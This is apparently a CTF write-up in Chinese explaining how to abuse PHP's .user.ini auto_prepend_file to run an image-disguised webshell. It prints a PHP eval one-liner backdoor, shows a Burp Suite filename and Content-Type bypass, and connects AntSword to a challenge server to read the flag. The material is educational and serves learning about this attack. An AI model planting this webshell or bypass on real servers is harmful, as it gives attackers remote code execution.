CTF之文件上传(.user.ini)

.user.ini 本身不是漏洞,但它经常被攻击者利用来实施攻击,属于配置滥用或权限提升类型的安全问题。

具体的攻击手法:

攻击者最常利用的是 auto_prepend_fileauto_append_file 这两个指令。

攻击步骤:

  1. 找到入口:攻击者先通过其他漏洞(如程序漏洞、弱密码等)获得在网站目录上传文件的权限。

  2. 上传恶意文件 :上传一个包含后门代码的图片或文本文件,比如 evil.jpg,内容其实是 <?php @eval($_REQUEST['cmd']); ?>

  3. 创建或修改.user.ini :在上传目录创建或修改 .user.ini 文件,内容为:

  4. auto_prepend_file = evil.jpg

  5. 后果 :现在该目录下的每一个PHP文件在执行时,都会自动先执行 evil.jpg 中的恶意代码,攻击者就获得了整个目录的控制权。


CTF之文件上传:利用.user.ini文件获取控制权限

1.看到这个题目,就知道要上传图片来获取权限

2.这时我构造了一个带有恶意代码的图片文件,命名为a.jpg,但是直接上传是不可能获取权限的,服务器看到.jpg, .txt, .html这些扩展名,会认为它们是静态文件(图片、文本、网页),它会直接读取文件的内容,并发送给浏览器,不会调用 PHP 解释器。

这时.user.ini配置文件就起作用了,PHP 解释器开始工作前,先读取并应用了目录下的.user.ini配置文件,利用.user.ini的 auto_prepend_file 指令,将一个本不会被执行的图片木马(a.jpg)变成在每个 PHP 文件执行前都会自动运行的前置文件,从而劫持整个目录的执行流程。它先要去执行a.jpg 文件,虽然 a.jpg扩展名是 .jpg,但此时它是在 PHP 解释器内部被包含的,PHP 解释器不在乎文件扩展名,它只认文件内容里的 <?php ?> 标签。于是,它成功地执行了a.jpg里的后门代码 eval($_REQUEST['a'])。(a是下面蚁剑连接网站的参数)

3.因为系统无法将文件命名为.user.ini,只能暂时命名为user.ini,所以需要burpsuite拦截请求,将文件名改为.user.ini,并且将Content-type改为image/jpg类型才能被上传。

这时.user.ini就上传成功了

而a.jpg本来就是image/jpg类型,肯定能直接上传

4.蚁剑连接http://61.147.171.35:53191/uploads/index.php(不是直接连接 a.jpg,而是连接一个该目录下肯定存在的正常 PHP 文件(index.php)),并设置参数为a(这个密码对应木马代码中的 $_REQUEST['a'] 的参数名)。

连接时

  1. (1)当你点击"测试连接"时,蚁剑向 http://61.147.171.35:53191/uploads/index.php 发送一个 HTTP 请求。

  2. (2)服务器准备执行 /uploads/index.php

  3. (3)在执行前,PHP 引擎读取并应用了 /uploads/ 目录下的 .user.ini 设置。根据 auto_prepend_file=a.jpg 指令,PHP 引擎首先去包含并执行 a.jpg 文件。PHP 解释器会解析 a.jpg 中的 <?php ... ?> 标签,于是 eval($_REQUEST['a']) 这行代码被执行。

  4. (5)此时,蚁剑发送的请求中正好携带了参数 a,其值是一段经过 Base64 编码的、用于测试连接的 PHP 代码(比如执行系统命令,列出当前目录的所有文件和详细信息)。eval 函数执行了这段代码,并将结果返回给蚁剑。

  5. (6)蚁剑收到响应,确认后门生效,显示"连接成功"。

获取权限后的操作

  1. 连接成功后,蚁剑的界面(如截图所示)就变成了一个可视化的文件管理器。可以像操作本地文件夹一样,浏览服务器上的文件,最终找到并打开 /flag 文件,获取到flag内容,完成题目。
相关推荐
white_ant7 小时前
安全认证与 API 网关
安全
xixixi7777717 小时前
三大 AI 安全里程碑:Akamai 高危风险预警、智能体水印强制落地、PQC 量子安全全产业链统一
大数据·人工智能·安全·ai·大模型·智能体·政策
hz5678920 小时前
电子远程评标系统哪家好?安全、合规、易用平台评测指南
安全·云计算·音视频·实时音视频·信息与通信
MartinYeung520 小时前
[论文学习]大语言模型安全综述:攻击、防御、对齐、度量与护栏的深度解析
学习·安全·语言模型
卓豪终端管理1 天前
企业数据防泄漏:现代设备控制如何成为终端安全的关键防线
安全
技术不好的崎鸣同学1 天前
[GXYCTF2019]Ping Ping Ping 思路及解法
网络·安全·web安全
GEO_youxuan1 天前
2026年儿童电话手表推荐:定位精度、通话安全与健康监测深度横评
安全
数据知道1 天前
安全报告怎么写才专业:渗透测试报告模板与踩坑
安全·网络安全·漏洞修复·安全报告·渗透测试报告
doiito1 天前
【安全,架构】RustyVault 项目深度分析报告以及和HashiCorp Vault的差异
后端·安全·rust
2601_962851741 天前
计算机毕业设计之基于SSM的网络安全课程资源分享平台
vue.js·算法·安全·web安全·yolo·目标检测·课程设计